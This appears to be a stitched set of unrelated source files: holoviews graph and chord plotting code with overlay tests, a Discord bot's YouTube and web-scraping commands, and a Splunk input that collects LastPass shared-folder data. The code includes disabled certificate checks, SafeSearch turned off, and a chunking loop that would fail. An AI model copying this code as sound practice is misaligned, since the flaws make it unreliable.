style['edge_clim'] = (style.pop('edge_vmin'), style.pop('edge_vmax'))
return style
def get_data(self, element, ranges, style):
xidx, yidx = (1, 0) if self.invert_axes else (0, 1)
pxs, pys = (element.nodes.dimension_values(i) for i in range(2))
dims = element.nodes.dimensions()
self._compute_styles(element, ranges, style)
paths = element._split_edgepaths.split(datatype='array', dimensions=element.edgepaths.kdims)
if self.invert_axes:
paths = [p[:, ::-1] for p in paths]
return {'nodes': (pxs, pys), 'edges': paths}, style, {'dimensions': dims}
def get_extents(self, element, ranges, range_type='combined'):
return super(GraphPlot, self).get_extents(element.nodes, ranges, range_type)
def init_artists(self, ax, plot_args, plot_kwargs):
# Draw edges
color_opts = ['c', 'cmap', 'vmin', 'vmax', 'norm']
groups = [g for g in self._style_groups if g != 'edge']
edge_opts = {k[5:] if 'edge_' in k else k: v
for k, v in plot_kwargs.items()
if not any(k.startswith(p) for p in groups)
and k not in color_opts}
paths = plot_args['edges']
if self.filled:
coll = PolyCollection
if 'colors' in edge_opts:
edge_opts['facecolors'] = edge_opts.pop('colors')
else:
coll = LineCollection
edges = coll(paths, **edge_opts)
ax.add_collection(edges)
# Draw nodes
xs, ys = plot_args['nodes']
groups = [g for g in self._style_groups if g != 'node']
node_opts = {k[5:] if 'node_' in k else k: v
for k, v in plot_kwargs.items()
if not any(k.startswith(p) for p in groups)}
if 'size' in node_opts: node_opts['s'] = node_opts.pop('size')**2
nodes = ax.scatter(xs, ys, **node_opts)
return {'nodes': nodes, 'edges': edges}
def _update_nodes(self, element, data, style):
nodes = self.handles['nodes']
xs, ys = data['nodes']
nodes.set_offsets(np.column_stack([xs, ys]))
cdim = element.nodes.get_dimension(self.color_index)
if cdim and 'c' in style:
nodes.set_clim((style['vmin'], style['vmax']))
nodes.set_array(style['c'])
if 'norm' in style:
nodes.norm = style['norm']
def _update_edges(self, element, data, style):
edges = self.handles['edges']
paths = data['edges']
edges.set_paths(paths)
edges.set_visible(style.get('visible', True))
cdim = element.get_dimension(self.edge_color_index)
if cdim:
if 'edge_array' in style:
edges.set_clim(style['edge_clim'])
edges.set_array(style['edge_array'])
if 'norm' in style:
edges.norm = style['edge_norm']
elif 'edge_colors' in style:
if self.filled:
edges.set_facecolors(style['edge_colors'])
else:
edges.set_edgecolors(style['edge_colors'])
def update_handles(self, key, axis, element, ranges, style):
data, style, axis_kwargs = self.get_data(element, ranges, style)
self._update_nodes(element, data, style)
self._update_edges(element, data, style)
return axis_kwargs
class TriMeshPlot(GraphPlot):
filled = param.Boolean(default=False, doc="""
Whether the triangles should be drawn as filled.""")
style_opts = GraphPlot.style_opts + ['edge_facecolors']
def get_data(self, element, ranges, style):
simplex_dim = element.get_dimension(self.edge_color_index)
vertex_dim = element.nodes.get_dimension(self.edge_color_index)
if not isinstance(self.edge_color_index, int) and vertex_dim and not simplex_dim:
simplices = element.array([0, 1, 2])
z = element.nodes.dimension_values(vertex_dim)
z = z[simplices].mean(axis=1)
element = element.add_dimension(vertex_dim, len(element.vdims), z, vdim=True)
# Ensure the edgepaths for the triangles are generated before plotting
element.edgepaths
return super(TriMeshPlot, self).get_data(element, ranges, style)
class ChordPlot(GraphPlot):
label_index = param.ClassSelector(default=None, class_=(basestring, int),
allow_None=True, doc="""
Index of the dimension from which the node labels will be drawn""")
style_opts = GraphPlot.style_opts + ['text_font_size', 'label_offset']
_style_groups = ['edge', 'node', 'arc']
def get_extents(self, element, ranges, range_type='combined'):
"""
A Chord plot is always drawn on a unit circle.
"""
xdim, ydim = element.nodes.kdims[:2]
if range_type not in ('combined', 'data'):
return xdim.range[0], ydim.range[0], xdim.range[1], ydim.range[1]
rng = 1.1 if element.nodes.get_dimension(self.label_index) is None else 1.4
x0, x1 = max_range([xdim.range, (-rng, rng)])
y0, y1 = max_range([ydim.range, (-rng, rng)])
return (x0, y0, x1, y1)
def get_data(self, element, ranges, style):
data, style, plot_kwargs = super(ChordPlot, self).get_data(element, ranges, style)
if isinstance(style.get('node_facecolors'), list):
angles = element._angles
paths = []
for i in range(len(element.nodes)):
start, end = angles[i:i+2]
vals = np.linspace(start, end, 20)
paths.append(np.column_stack([np.cos(vals), np.sin(vals)]))
data['arcs'] = paths
style['arc_colors'] = style['node_facecolors']
style['arc_linewidth'] = 10
lidx = element.nodes.get_dimension(self.label_index)
if lidx is None:
if self.label_index is not None:
dims = element.nodes.dimensions()[2:]
self.warning("label_index supplied to Chord not found, "
"expected one of %s, got %s." %
(dims, self.label_index))
return data, style, plot_kwargs
nodes = element.nodes
if element.vdims:
values = element.dimension_values(element.vdims[0])
if values.dtype.kind in 'uif':
edges = Dataset(element)[values>0]
nodes = list(np.unique([edges.dimension_values(i) for i in range(2)]))
nodes = element.nodes.select(**{element.nodes.kdims[2].name: nodes})
offset = style.get('label_offset', 1.05)
xs, ys = (nodes.dimension_values(i)*offset for i in range(2))
labels = [lidx.pprint_value(v) for v in nodes.dimension_values(lidx)]
angles = np.rad2deg(np.arctan2(ys, xs))
data['text'] = (xs, ys, labels, angles)
return data, style, plot_kwargs
def init_artists(self, ax, plot_args, plot_kwargs):
artists = {}
if 'arcs' in plot_args:
color_opts = ['c', 'cmap', 'vmin', 'vmax', 'norm']
groups = [g for g in self._style_groups if g != 'arc']
edge_opts = {k[4:] if 'arc_' in k else k: v
for k, v in plot_kwargs.items()
if not any(k.startswith(p) for p in groups)
and k not in color_opts}
paths = plot_args['arcs']
edges = LineCollection(paths, **edge_opts)
ax.add_collection(edges)
artists['arcs'] = edges
artists.update(super(ChordPlot, self).init_artists(ax, plot_args, plot_kwargs))
if 'text' in plot_args:
fontsize = plot_kwargs.get('text_font_size', 8)
labels = []
for (x, y, l, a) in zip(*plot_args['text']):
label = ax.annotate(l, xy=(x, y), xycoords='data', rotation=a,
horizontalalignment='left', fontsize=fontsize,
verticalalignment='center', rotation_mode='anchor')
labels.append(label)
artists['labels'] = labels
return artists
def _update_arcs(self, element, data, style):
edges = self.handles['arcs']
paths = data['arcs']
edges.set_paths(paths)
edges.set_visible(style.get('visible', True))
def _update_labels(self, ax, element, data, style):
labels = self.handles.get('labels', [])
for label in labels:
try:
label.remove()
except:
pass
if 'text' not in data:
self.handles['labels'] = []
return
labels = []
fontsize = style.get('text_font_size', 8)
for (x, y, l, a) in zip(*data['text']):
label = ax.annotate(l, xy=(x, y), xycoords='data', rotation=a,
horizontalalignment='left', fontsize=fontsize,
verticalalignment='center', rotation_mode='anchor')
labels.append(label)
self.handles['labels'] = labels
def update_handles(self, key, axis, element, ranges, style):
data, style, axis_kwargs = self.get_data(element, ranges, style)
self._update_nodes(element, data, style)
self._update_edges(element, data, style)
self._update_arcs(element, data, style)
self._update_labels(axis, element, data, style)
return axis_kwargs
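# Illustrative usage sketch (added for clarity; assumes a holoviews environment
# with the matplotlib backend loaded, not part of this module):
#   import holoviews as hv
#   hv.extension('matplotlib')
#   chord = hv.Chord([(0, 1, 1), (1, 2, 2), (2, 0, 3)])
#   chord.options(label_index='index')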
```
#### File: plotting/matplotlib/testoverlayplot.py
```python
import numpy as np
from holoviews.core import Overlay, NdOverlay, DynamicMap, HoloMap
from holoviews.element import Curve, Scatter
from .testplot import TestMPLPlot, mpl_renderer
try:
from holoviews.plotting.mpl import OverlayPlot
except:
pass
class TestOverlayPlot(TestMPLPlot):
def test_interleaved_overlay(self):
"""
Test to avoid regression after fix of https://github.com/ioam/holoviews/issues/41
"""
o = Overlay([Curve(np.array([[0, 1]])) , Scatter([[1,1]]) , Curve(np.array([[0, 1]]))])
OverlayPlot(o)
def test_overlay_empty_layers(self):
overlay = Curve(range(10)) * NdOverlay()
plot = mpl_renderer.get_plot(overlay)
self.assertEqual(len(plot.subplots), 1)
def test_overlay_update_plot_opts(self):
hmap = HoloMap(
{0: (Curve([]) * Curve([])).options(title_format='A'),
1: (Curve([]) * Curve([])).options(title_format='B')}
)
plot = mpl_renderer.get_plot(hmap)
self.assertEqual(plot.handles['title'].get_text(), 'A')
plot.update((1,))
self.assertEqual(plot.handles['title'].get_text(), 'B')
def test_overlay_update_plot_opts_inherited(self):
hmap = HoloMap(
{0: (Curve([]).options(title_format='A') * Curve([])),
1: (Curve([]).options(title_format='B') * Curve([]))}
)
plot = mpl_renderer.get_plot(hmap)
self.assertEqual(plot.handles['title'].get_text(), 'A')
plot.update((1,))
self.assertEqual(plot.handles['title'].get_text(), 'B')
def test_overlay_apply_ranges_disabled(self):
overlay = (Curve(range(10)) * Curve(range(10))).options('Curve', apply_ranges=False)
plot = mpl_renderer.get_plot(overlay)
self.assertTrue(all(np.isnan(e) for e in plot.get_extents(overlay, {})))
def test_overlay_empty_element_extent(self):
overlay = Curve([]).redim.range(x=(-10, 10)) * Scatter([]).redim.range(y=(-20, 20))
plot = mpl_renderer.get_plot(overlay)
extents = plot.get_extents(overlay, {})
self.assertEqual(extents, (-10, -20, 10, 20))
def test_dynamic_subplot_remapping(self):
# Checks that a plot is appropriately updated when reused
def cb(X):
return NdOverlay({i: Curve(np.arange(10)+i) for i in range(X-2, X)})
dmap = DynamicMap(cb, kdims=['X']).redim.range(X=(1, 10))
plot = mpl_renderer.get_plot(dmap)
plot.update((3,))
for i, subplot in enumerate(plot.subplots.values()):
self.assertEqual(subplot.cyclic_index, i+3)
self.assertEqual(list(subplot.overlay_dims.values()), [i+1])
def test_dynamic_subplot_creation(self):
def cb(X):
return NdOverlay({i: Curve(np.arange(10)+i) for i in range(X)})
dmap = DynamicMap(cb, kdims=['X']).redim.range(X=(1, 10))
plot = mpl_renderer.get_plot(dmap)
self.assertEqual(len(plot.subplots), 1)
plot.update((3,))
self.assertEqual(len(plot.subplots), 3)
for i, subplot in enumerate(plot.subplots.values()):
self.assertEqual(subplot.cyclic_index, i)
def test_overlay_xlabel(self):
overlay = (Curve(range(10)) * Curve(range(10))).options(xlabel='custom x-label')
axes = mpl_renderer.get_plot(overlay).handles['axis']
self.assertEqual(axes.get_xlabel(), 'custom x-label')
def test_overlay_ylabel(self):
overlay = (Curve(range(10)) * Curve(range(10))).options(ylabel='custom y-label')
axes = mpl_renderer.get_plot(overlay).handles['axis']
self.assertEqual(axes.get_ylabel(), 'custom y-label')
def test_overlay_xlabel_override_propagated(self):
overlay = (Curve(range(10)).options(xlabel='custom x-label') * Curve(range(10)))
axes = mpl_renderer.get_plot(overlay).handles['axis']
self.assertEqual(axes.get_xlabel(), 'custom x-label')
def test_overlay_ylabel_override(self):
overlay = (Curve(range(10)).options(ylabel='custom y-label') * Curve(range(10)))
axes = mpl_renderer.get_plot(overlay).handles['axis']
self.assertEqual(axes.get_ylabel(), 'custom y-label')
```
|
{
"source": "JewLion/DontBanDog",
"score": 3
}
|
#### File: JewLion/DontBanDog/daudio.py
```python
import asyncio
import discord
import urllib
import re
import requests
import pafy
import os
import sys
import time
import json
import queue
import subprocess
import youtube_dl
from mutagen.mp3 import MP3
from bs4 import BeautifulSoup
from discord.ext import commands
youtube_dl.utils.bug_reports_message = lambda: ''
ytdl_format_options = {
'format': 'bestaudio/best',
'outtmpl': '%(extractor)s-%(id)s-%(title)s.%(ext)s',
'restrictfilenames': True,
'noplaylist': True,
'nocheckcertificate': True,
'ignoreerrors': False,
'logtostderr': False,
'quiet': True,
'no_warnings': True,
'default_search': 'auto',
'source_address': '0.0.0.0'
# bind to ipv4 since ipv6 addresses cause issues sometimes
}
ffmpeg_options = {
'options': '-vn'
}
ytdl = youtube_dl.YoutubeDL(ytdl_format_options)
def youtube(query: str, num: int = 0):
"""Returns the first youtube video"""
url = 'https://youtube.com/results?search_query=' + query.replace(" ", "+")
print(url)
r = requests.get(url).text
num1 = r.find("// scraper_data_begin")
num2 = r.find("// scraper_data_end")
# print (num1)
# print (num2)
yInit = r[num1:num2-1].strip()
num1 = yInit.find('{')
res = yInit[num1:-1]
resource = json.loads(res)
ls = resource['contents']['twoColumnSearchResultsRenderer']
ls = ls['primaryContents']['sectionListRenderer']['contents']
content = ls[0]['itemSectionRenderer']['contents']
    for i in range(10):
        try:
            videoRenderer = content[i]['videoRenderer']
            break
        except Exception:
            print(content[i])
    else:
        # No 'videoRenderer' entry found in the first 10 results.
        raise ValueError('No video results found for query: ' + query)
vid = (videoRenderer["videoId"])
page = ("https://youtube.com/watch?v=" + vid)
return page
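# Illustrative example (hypothetical video id):
#   youtube('lofi hip hop') -> 'https://youtube.com/watch?v=<video_id>'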
async def disconnect(vc, ctx, cls):
await vc.disconnect()
cls.remove_voice_state(ctx.guild)
async def play_soundfile(cls, ctx, sf):
vc = ctx.voice_client
path = sf
if vc:
state = vc
else:
state = await ctx.message.author.voice.channel.connect()
    # Wrap the source in PCMVolumeTransformer so the 0.2 volume actually takes effect.
    state.play(discord.PCMVolumeTransformer(discord.FFmpegPCMAudio(sf), volume=0.2))
await ctx.message.channel.purge(limit=1)
waitTime = MP3(path).info.length
    await asyncio.sleep(waitTime)
await disconnect(state, ctx, cls)
class YTDLSource(discord.PCMVolumeTransformer):
def __init__(self, source, *, data, volume=0.5):
super().__init__(source, volume)
self.data = data
self.title = data.get('title')
self.url = data.get('url')
self.views = data.get('view_count')
self.uploader = data.get('uploader')
self.duration = data.get('duration')
@classmethod
async def from_url(cls, url, *, loop=None, stream=True):
loop = loop or asyncio.get_event_loop()
data = await loop.run_in_executor(None, lambda: ytdl.extract_info(url, download=not stream))
if 'entries' in data:
data = data['entries'][0]
filename = data['url'] if stream else ytdl.prepare_filename(data)
return cls(discord.FFmpegPCMAudio(filename, **ffmpeg_options),
data=data)
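    # Illustrative usage inside an async command (hypothetical URL and voice client):
    #   player = await YTDLSource.from_url('https://youtube.com/watch?v=...', loop=bot.loop)
    #   voice_client.play(player)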
class VoiceEntry:
def __init__(self, message, player, vc, volume):
self.requester = message.author
self.channel = message.channel
self.player = player
self.volume = volume
self.vc = vc
def __str__(self):
        fmt = ('*{0.title}* uploaded by {0.uploader} and '
               'requested by {1.display_name} with ')
try:
views = self.player.views
num = int(views)
fmt = fmt + (f"{num:,d}") + " views"
except Exception:
fmt += "an unknown amount of views"
fmt += " at {0}% volume".format(self.volume*100)
duration = self.player.duration
if duration:
fmt = fmt + ' [length: {0[0]}m {0[1]}s]'.format(
divmod(duration, 60))
return fmt.format(self.player, self.requester)
class VoiceState:
def __init__(self, bot):
self.current = None
self.voice = None
self.bot = bot
self.play_next_song = asyncio.Event()
self.songs = asyncio.Queue()
self.skip_votes = set() # a set of user_ids that voted
self.audio_player = bot.loop.create_task(self.audio_player_task())
def is_playing(self):
if self.voice is None or self.current is None:
return False
player = self.current.player
return not player.is_done()
@property
def player(self):
return self.current.player
def skip(self):
self.toggle_next()
def toggle_next(self):
self.bot.loop.call_soon_threadsafe(self.play_next_song.set)
async def audio_player_task(self):
await self.bot.wait_until_ready()
while True:
self.play_next_song.clear()
self.current = await self.songs.get()
if False:
try:
self.current = await YTDLSource.regather_stream(
self.current, loop=self.bot.loop)
except Exception as e:
print(e)
continue
self.current.vc.play(
self.current.player, after=lambda _: self.toggle_next())
await self.current.channel.send('Now playing ' + str(self.current))
await self.play_next_song.wait()
# self.current.cleanup()
# self.current = None
```
#### File: JewLion/DontBanDog/search.py
```python
import discord
import urllib
import re
import os
import random
import requests
import html
import json
from bs4 import BeautifulSoup
from discord.ext import commands
class Search(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(pass_context=True)
async def scrabble(self, ctx, word):
url = "https://dictionary.com/browse/" + word
r = requests.get(url).text
if ("no results" in r.lower()):
await ctx.send("word bad bad")
return
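        # Scrabble letter values for 'a'..'z'; the lookup below uses ord(letter) - 97.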
values = [1, 3, 3, 2, 1, 4, 2, 4, 1, 8, 5, 1, 3, 1, 1, 3, 10, 1, 1, 1,
1, 4, 4, 8, 4, 10]
points = 0
for letter in word:
num = ord(letter.lower())-97
if (num < 0 or num > 25):
await ctx.send("word bad bad")
return
points += values[num]
await ctx.send(points)
@commands.command(pass_context=True)
async def youtube(self, ctx, *, query):
"""Returns the first youtube video"""
utub = 'https://youtube.com/results?search_query='
url = utub + query.replace(" ", "+")
r = requests.get(url).text
num1 = r.find('{"videoRenderer')
num2 = r.find('{"videoRenderer', num1+1)
# print (num1)
# print (num2)
videoRenderer = (json.loads(r[num1:num2-1])["videoRenderer"])
vid = (videoRenderer["videoId"])
page = ("https://youtube.com/watch?v=" + vid)
await ctx.send(page)
@commands.command(pass_context=True)
async def bImage(self, ctx, query, num=1):
"""Returns the first image from the bing search"""
webpage = "http://www.bing.com/images/search?q=" + query.replace(" ", "+") + "&view=detailv2&adlt=off&selectedIndex=0"
html_content = urllib.request.urlopen(webpage)
str_html = html_content.read().decode("utf-8")
match = re.findall(r'src="http://?([^\'" >]+)', str_html)
if match:
try:
await ctx.send("http://" + match[num-1])
except (Exception):
await ctx.send("```No " + str(num) + "th Result```")
else:
await ctx.send("```No Image Found```")
@commands.command(pass_context=True)
async def gImage(self, ctx, query, num=1):
"""Returns the first image from the google search"""
imageKey = ""
f = open("secrets.txt", "r")
imageKey = f.readlines()[1].strip()
f.close()
webpage = "https://www.googleapis.com/customsearch/v1?cx=013629950505680552901%3Axac8ijijt08&searchType=image&key=" + imageKey + "&q=" + query.replace(" ", "+")
r = requests.get(webpage).text
js = json.loads(r)
try:
            pic = js['items'][num - 1]['link']
listd = pic.split('.')
end = (listd[len(listd)-1])
if (end[:3] == 'jpg'):
end = 'jpg'
elif (end[:3] == 'png'):
end = 'png'
elif (end[:4] == 'jpeg'):
end = 'jpg'
else:
raise Exception("not jpg or png")
urllib.request.urlretrieve(pic, "img/gimage." + end)
await ctx.send(file=discord.File('img/gimage.' + end))
os.remove('img/gimage.'+end)
return
except IndexError:
await ctx.send("```No " + str(num) + "th Result```")
except Exception:
try:
await ctx.send(pic)
except Exception:
await ctx.send("```No Image Found```")
@commands.command(pass_context=True)
    async def ub(self, ctx, query=None):
"""Returns the first Urban Dictionary result"""
        if query is None:
webpage = "https://www.urbandictionary.com/random.php"
else:
webpage = "http://www.urbandictionary.com/define.php?term=" + query.replace(" ", "+")
r = requests.get(webpage).text
soup = BeautifulSoup(r, 'lxml')
title = soup.find_all("div", {"class": "def-header"})[0]
await ctx.send(title.find_all("a")[0].text)
meaning = soup.find_all("div", {"class": "meaning"})[0].text
await ctx.send("Meaning: " + html.unescape(meaning))
example = soup.find_all("div", {"class": "example"})[0].text
await ctx.send("Example: " + html.unescape(example))
@commands.command(pass_context=True)
async def xkcd(self, ctx, num:int = -1):
"""Returns a random xkcd comic"""
if (num < 0):
webpage = "https://c.xkcd.com/random/comic/"
else:
try:
webpage = "https://xkcd.com/" + str(num)
r = requests.get(webpage).text
soup = BeautifulSoup(r, 'lxml')
title = soup.find_all("div", {"id": "ctitle"})[0]
comic = soup.find_all("div", {"id": "comic"})[0]
img = comic.find_all("img")[0]
await ctx.send(title.text)
await ctx.send("https:" + img.get('src'))
return
except IndexError:
webpage = "https://xkcd.com/"
r = requests.get(webpage).text
        soup = BeautifulSoup(r, 'lxml')
title = soup.find_all("div", {"id": "ctitle"})[0]
comic = soup.find_all("div", {"id": "comic"})[0]
img = comic.find_all("img")[0]
await ctx.send(title.text)
await ctx.send("https:" + img.get('src'))
@commands.command(pass_context=True)
async def chobbes(self, ctx):
calvin = 'https://www.gocomics.com/random/calvinandhobbes'
r = requests.get(calvin).text
soup = BeautifulSoup(r, 'lxml')
pic = soup.find_all('img', {'class':'img-fluid'})[1].get('src')
urllib.request.urlretrieve(pic, 'img/calvin.jpg')
await ctx.send(file=discord.File('img/calvin.jpg'))
os.remove("img/calvin.jpg")
@commands.command(pass_context=True)
async def define (self, ctx, query:str, num:int = 1):
"""Returns a definition"""
url = "https://dictionary.com/browse/" + query
r = requests.get(url).text
soup = BeautifulSoup(r, 'lxml')
defin = soup.find_all("div", {"class": "def-content"})[num - 1]
await ctx.send(defin.text)
def setup(bot):
bot.add_cog(Search(bot))
```
|
{
"source": "jewnix/TA-lastpass",
"score": 2
}
|
#### File: TA-lastpass/bin/input_module_lastpass_shared_folders.py
```python
import re
import os
import sys
import time
import json
import copy
import requests
import datetime
import traceback
LP_CHECKPOINT_KEY = 'LastPass_folders'
CMD_KEY = 'getsfdata'
CMD_KEY = 'getdetailedsfdata'
PAGE_SIZE = 2000
USER_EV_LIMIT = 50
CHECKPOINT_SAVE_LIMIT = 100
'''
IMPORTANT
Edit only the validate_input and collect_events functions.
Do not edit any other part in this file.
This file is generated only once when creating the modular input.
'''
'''
# For advanced users, if you want to create single instance mod input, uncomment this method.
def use_single_instance_mode():
return True
'''
def validate_input(helper, definition):
"""Implement your own validation logic to validate the input stanza configurations"""
# This example accesses the modular input variable
# lastpass_api_url = definition.parameters.get('lastpass_api_url', None)
# time_start = definition.parameters.get('time_start', None)
url = definition.parameters.get('lastpass_api_url', None)
if 'https://' in url:
return
# replace if http but not https
elif 'http' in url and 'https://' not in url:
raise ValueError('"HTTP" protocol not allowed. Please update for HTTPS.')
elif '.' not in url:
raise ValueError('URL submission invalid. Please validate domain.')
elif 'https://' not in url:
# add proper url
definition.parameters['lastpass_api_url'] = 'https://'+url
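# For reference, the normalization above behaves as follows (illustrative inputs):
#   'lastpass.com/enterpriseapi.php'  -> rewritten to 'https://lastpass.com/enterpriseapi.php'
#   'http://lastpass.com/...'         -> rejected with ValueError (HTTPS required)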
def save_checkpoint(helper, idx_folder, iter_user = 0):
'''
update checkpoint with index to track folder list
@param idx_folder: index for folders
@type idx_folder: int
@param iter_user: index for user count within folder
@type iter_user: int
'''
try:
if isinstance(idx_folder, int) and isinstance(iter_user, int):
state_payload = {}
state_payload['idx_folder'] = idx_folder
state_payload['iter_user'] = iter_user
helper.save_check_point(LP_CHECKPOINT_KEY, state_payload)
else:
raise Exception(f'Invalid index key types for checkpointing LastPass shared folder input: folder_index={idx_folder} user_iter_index={iter_user}')
except Exception as e:
raise IOError(f'Save LastPass folder checkpoint failed. folder_index={idx_folder} user_iter_index={iter_user} reason="{e}"')
def get_checkpoint(helper):
'''
extract checkpoint index value
:return: index value or None
'''
# if checkpoint corrupted or not readable, consider empty
try:
state_payload = helper.get_check_point(LP_CHECKPOINT_KEY)
except Exception as e:
        helper.log_warning(f'Loading checkpoint. Unable to load checkpoint. reason="{e}"')
return None
if isinstance(state_payload, dict):
return state_payload
helper.log_warning(f'Loading checkpoint. Invalid index key types for LastPass shared folder input. checkpoint_payload="{repr(state_payload)}"')
return None
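# For reference, a checkpoint payload produced by save_checkpoint() and read back
# here looks like (illustrative index values):
#   {'idx_folder': 12, 'iter_user': 150}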
def collect_events(helper, ew):
"""Implement your data collection logic here
# The following examples get the arguments of this input.
# Note, for single instance mod input, args will be returned as a dict.
# For multi instance mod input, args will be returned as a single value.
opt_text = helper.get_arg('text')
opt_text_1 = helper.get_arg('text_1')
# In single instance mode, to get arguments of a particular input, use
opt_text = helper.get_arg('text', stanza_name)
opt_text_1 = helper.get_arg('text_1', stanza_name)
# get input type
helper.get_input_type()
# The following examples get input stanzas.
# get all detailed input stanzas
helper.get_input_stanza()
# get specific input stanza with stanza name
helper.get_input_stanza(stanza_name)
# get all stanza names
helper.get_input_stanza_names()
# The following examples get options from setup page configuration.
# get the loglevel from the setup page
loglevel = helper.get_log_level()
# get proxy setting configuration
proxy_settings = helper.get_proxy()
# get account credentials as dictionary
account = helper.get_user_credential_by_username("username")
account = helper.get_user_credential_by_id("account id")
# get global variable configuration
global_cid = helper.get_global_setting("cid")
global_provhash = helper.get_global_setting("provhash")
# The following examples show usage of logging related helper functions.
# write to the log for this modular input using configured global log level or INFO as default
helper.log("log message")
# write to the log using specified log level
helper.log_debug("log message")
helper.log_info("log message")
helper.log_warning("log message")
helper.log_error("log message")
helper.log_critical("log message")
# set the log level for this modular input
# (log_level can be "debug", "info", "warning", "error" or "critical", case insensitive)
helper.set_log_level(log_level)
# The following examples send rest requests to some endpoint.
response = helper.send_http_request(url, method, parameters=None, payload=None,
headers=None, cookies=None, verify=True, cert=None,
timeout=None, use_proxy=True)
# get the response headers
r_headers = response.headers
# get the response body as text
r_text = response.text
# get response body as json. If the body text is not a json string, raise a ValueError
r_json = response.json()
# get response cookies
r_cookies = response.cookies
# get redirect history
historical_responses = response.history
# get response status code
r_status = response.status_code
    # check the response status, if the status is not successful, raise requests.HTTPError
response.raise_for_status()
# The following examples show usage of check pointing related helper functions.
# save checkpoint
helper.save_check_point(key, state)
# delete checkpoint
helper.delete_check_point(key)
# get checkpoint
state = helper.get_check_point(key)
# To create a splunk event
helper.new_event(data, time=None, host=None, index=None, source=None, sourcetype=None, done=True, unbroken=True)
"""
'''
# The following example writes a random number as an event. (Multi Instance Mode)
# Use this code template by default.
import random
data = str(random.randint(0,100))
event = helper.new_event(source=helper.get_input_type(), index=helper.get_output_index(), sourcetype=helper.get_sourcetype(), data=data)
ew.write_event(event)
'''
'''
# The following example writes a random number as an event for each input config. (Single Instance Mode)
# For advanced users, if you want to create single instance mod input, please use this code template.
# Also, you need to uncomment use_single_instance_mode() above.
import random
input_type = helper.get_input_type()
for stanza_name in helper.get_input_stanza_names():
data = str(random.randint(0,100))
event = helper.new_event(source=input_type, index=helper.get_output_index(stanza_name), sourcetype=helper.get_sourcetype(stanza_name), data=data)
ew.write_event(event)
'''
rest_url = helper.get_arg('lastpass_api_url')
if not rest_url:
rest_url = 'https://lastpass.com/enterpriseapi.php'
# pre-fix domain to proper URL
elif 'https://' not in rest_url:
rest_url = f'https://{rest_url}'
helper.log_debug(f'LastPass parameter check: rest_url={rest_url}')
headers = { 'Content-Type': 'application/json' }
# build data params
data = {}
data['cid'] = helper.get_global_setting('cid')
data['provhash'] = helper.get_global_setting('provhash')
data['cmd'] = CMD_KEY
data['apiuser'] = 'splunk.collector'
''' algorithm w checkpointing:
if results are larger than max page size, checkpoint page index
'''
time_val = datetime.datetime.now().timestamp()
try:
helper.log_debug(f'LastPass shared folder collection. Collecting shared folder details.')
resp_ev = requests.post(rest_url, headers=headers, data=json.dumps(data))
if resp_ev.status_code != 200:
helper.log_critical(f'LastPass shared folder collection. request data failed.')
elif re.search(r"(Authorization Error)", resp_ev.text):
helper.log_exception(f'LastPass shared folder collection. request data failed. 401: Unauthorized. Verify cid/provhash.')
resp_ev_json = resp_ev.json()
# track for malformed REST call
if resp_ev_json.get('status') and 'OK' not in resp_ev_json.get('status'):
helper.log_critical(f'LastPass shared folder collection. REST call successful, but query is bad. Validate request params. Terminating script')
return
#sys.exit(1)
except Exception as e:
raise e
# track all folders
folders = {}
user_count = 1
temp_folder = None
helper.log_debug(f'LastPass shared folder collection. total_folders={len(resp_ev_json)}')
try:
for idx_folder, folder_id in enumerate(resp_ev_json):
findex = 0
temp_folder = resp_ev_json[folder_id]
user_count = len(resp_ev_json[folder_id]['users'])
helper.log_debug(f'LastPass shared folder collection. folder_id={folder_id} folder_user_count={user_count}')
# split folder details by user limit
if user_count > USER_EV_LIMIT:
for ff in range(0, user_count, USER_EV_LIMIT):
helper.log_debug(f'LastPass shared folder collection. iterating over user count. folder_id={folder_id} folder_user_count={user_count} curr_folder_user_count={ff}')
folder_idx = f'{folder_id}-{findex}'
folders[folder_idx] = {}
folders[folder_idx]['folder_id'] = folder_idx
folders[folder_idx]['folder_index'] = findex
folders[folder_idx]['time_collected'] = time_val
folders[folder_idx]['event'] = 'list_folders'
# copy all folder details into event entry,
# for user, copy slice of user list
for field in temp_folder.keys():
if field == 'users':
folders[folder_idx][field] = temp_folder[field][ff:(ff+USER_EV_LIMIT)]
else:
folders[folder_idx][field] = temp_folder[field]
                    folders[folder_idx]['user_count'] = len(folders[folder_idx]['users'])
event = helper.new_event(data=json.dumps(folders[folder_idx]),
time=time_val,
source=helper.get_input_type(),
index=helper.get_output_index(),
sourcetype=helper.get_sourcetype())
ew.write_event(event)
findex += 1
if findex % 3 == 0:
save_checkpoint(helper, idx_folder, ff)
helper.log_debug(f'LastPass shared folder collection. Updating LastPass identity checkpoint: {idx_folder} folder_user_iter={ff}')
# TODO need to validate limits on collecting shared folders
else:
folders[folder_id] = {}
folders[folder_id].update(temp_folder)
folders[folder_id]['folder_id'] = folder_id
folders[folder_id]['time_collected'] = time_val
folders[folder_id]['event'] = 'list_folders'
folders[folder_id]['user_count'] = len(folders[folder_id]['users'])
event = helper.new_event(data=json.dumps(folders[folder_id]),
time=time_val,
source=helper.get_input_type(),
index=helper.get_output_index(),
sourcetype=helper.get_sourcetype())
ew.write_event(event)
# checkpoint folder details for tracking
if idx_folder % CHECKPOINT_SAVE_LIMIT == 0:
save_checkpoint(helper, idx_folder)
helper.log_debug(f'LastPass shared folder collection. Updating LastPass identity checkpoint: {idx_folder}')
except Exception as e:
        helper.log_critical(f'LastPass shared folder collection. Error in forwarding data: {traceback.format_exc()}')
raise e
```
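The heart of the collector above is the splitting of large shared folders into events of at most USER_EV_LIMIT users. Below is a hedged, standalone sketch of just that slicing logic, detached from the Splunk helper plumbing; the folder payload is invented for illustration.
```python
# Standalone sketch of the user-chunking used above; the folder dict is made up.
USER_EV_LIMIT = 50

def chunk_folder(folder_id, folder, limit=USER_EV_LIMIT):
    users = folder.get('users', [])
    if len(users) <= limit:
        yield folder_id, dict(folder, user_count=len(users))
        return
    for findex, start in enumerate(range(0, len(users), limit)):
        chunk = dict(folder, users=users[start:start + limit])
        chunk['folder_index'] = findex
        chunk['user_count'] = len(chunk['users'])
        yield f'{folder_id}-{findex}', chunk

folder = {'sharedfoldername': 'Ops', 'users': [f'user{i}' for i in range(120)]}
for key, event in chunk_folder('101', folder):
    print(key, event['user_count'])   # 101-0 50, 101-1 50, 101-2 20
```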
#### File: TA-lastpass/bin/input_module_lastpass_users.py
```python
import re
import os
import sys
import time
import json
import copy
import requests
import datetime
import traceback
import hashlib
LP_CHECKPOINT_KEY = 'LastPass_user'
CMD_KEY = 'getuserdata'
